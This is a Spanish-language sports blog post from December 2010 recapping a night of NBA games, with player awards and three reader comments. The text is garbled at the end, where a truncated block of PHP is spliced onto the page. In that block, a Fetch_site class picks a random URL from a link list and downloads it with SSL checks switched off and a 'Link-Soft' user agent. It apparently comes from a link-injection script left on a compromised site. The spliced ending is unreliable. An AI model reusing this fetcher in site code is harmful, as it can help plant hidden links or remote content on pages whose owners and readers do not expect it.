La Crónica (07/12/2010)

08 de December de 2010 por txusma

Y van 10 seguidas. Los Mavs siguen con paso a firme a la estela de los Spurs esperando el momento propicio para pasarles por la izquierda y dejarles atrás. Anoche vencieron a los Warriors 100-105 a pesar de la ausencia de su pívot titular, Tyson Chandler, que tan buen nivel está mostrando esta campaña. Nowitzki fue el mejor de los suyos pero ayer destacaron los franceses Alex Ajinca y, sobretodo, Ian Mahinmi. ¿Quién ha dicho que en la NBA nunca te llega tu oportunidad?

Los Lakers continúan a 2 victorias de los Mavs tras su victoria en casa frente los Wizards (108-115). Empezaron fuertes los angelinos pero un Nick Young desatado igualó algo el partido en el tercer cuarto. Finalmente, Bryant, Odom y Gasol (que volvió a rozar el triple-doble) se encargaron de cerrar la victoria de los Lakers.

En el duelo más interesante del Oeste, los Blazers ganaron a los Suns 99-106 con la ausencia de Andre Miller. Puede no parecer a priori algo que merezca ser destacado pero es que Andre Miller llevaba disputados 632 partidos consecutivos. Ahora, el jugador que más partidos consecutivos lleva jugados es Derek Fisher con 434. La derrota de Phoenix se fraguó en el mal rendimiento del a segunda unidad con Goran Dragic a la cabeza. Los titulares tuvieron que volver a pista antes de lo previsto y ya no fueron capaces de enderezar la situación. Parece que este hecho se viene repitiendo con asiduidad y es algo que preocupa a Alvin Gentry y es que Nash y Hill no deberían jugar 39 minutos por noche.

En el resto de partidos de la jornada, victoria de los Hawks sobre los Nets (101-116) con un Josh Smith sublime e histórico (34 puntos con un 14 de 16); victoria de los Sixers 97-117 sobre unos Cavs a los que no salvaría ni la llegada de Iguodala; derrota de los Nuggets ante los Bobcats 98-100 evitando así la victoria número 1000 de George Karl; y finalmente victoria de los Rockets sobre los Pistons 83-97. La vuelta de Yao Ming creo que les preocupa más que alegra.

PREMIOS

MVP: Impresionante Josh Smith y sus 34 puntos con un acierto del 87%. El último jugador que hizo algo parecido en los Hawks fue, agarraos, Bob Pettitt hace 55 años.

Rookie: Grande John Wall. 22 puntos, 14 asistencias, 5 rebotes y 3 tapones. La mejor de las tarjetas para presentarse ante los glamourosos espectadores de Los Angeles. Y en los Nets, Damion James va sacando poco a poco la cabeza. Anoche 10 puntos y 6 rebotitos.

Sorpresa: Lesión de Chandler, problemas de faltas de Haywood y Mahinmi que salta a la cancha. Resultado: 12 puntos, 10 rebotes y 2 robos. Ser un jugador ssuperatlético tiene ventajas cuando te enfrentas a los Warriors.

Decepción: Suerte que estaba Scola para compensar el 0 de 6 de Brad Miller

Esfuerzo en vano: Aparte de John Wall también tenemos que destacar al “abuelo” Steve Nash, al que no dejan descansar y le obligan a anotar 24 puntos y repartir 15 asistencias. Nick Young y sus 30 puntos también se quedaron con la miel en los labios.

Comenta

3 comentarios a esta entrada

  1. Principe de Bel-Air dice:
    #1

    Parece que estos Mavs ya estan algo mas compenetrados que los Mavs del los pasados Playoffs que cayeron en primera ronda ante unos Spurs por los que nadie daba un duro( me incluyo), ojala vuelvan a verse las caras ya que sería una muy buena serie.

    Por otra parte Cleveland, aparte de que ni con iguodala conseguirían mucho mas de lo que consiguen ahora( ojala me equivoque…) pienso que están hoy por hoy destinados a un primer puesto en una Lottery Pick y por supuesto no liarla con la elección.

    Y por último el ROY de este año va a estar apretadito porque entre los matazos de Grffin y las Assitencias y los puntos de Wall cada noche se va a hacer dificil decidirse, quizás se lo llevará el que consiga llevar a su equipo más lejos esta temporada!

      Citar

  2. -=TheKing=- dice:
    #2

    Rumores de salida de Nash¿?????? como sea así adiós a los Suns esta campña.

      Citar

  3. Denise dice:
    #3

    El MVP se lo hubiera dado a Scola. Tremendo 35-12 del argentino, siempre supe que era bueno, pero no hasta el punto de convertirse en uno de los mejores 4’s del mundo. Con 6 centimetros más y un poco más de fisico, sería el mejor cuatro del mundo. Que capacidad para leer el pick and roll, para situarse en el sitio adecuado en el rebote, para fajarse debajo de los aros contra bicharracos con mucho más fisico y fuerza que él, y que cantidad de recursos ofensivos. Tremendo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>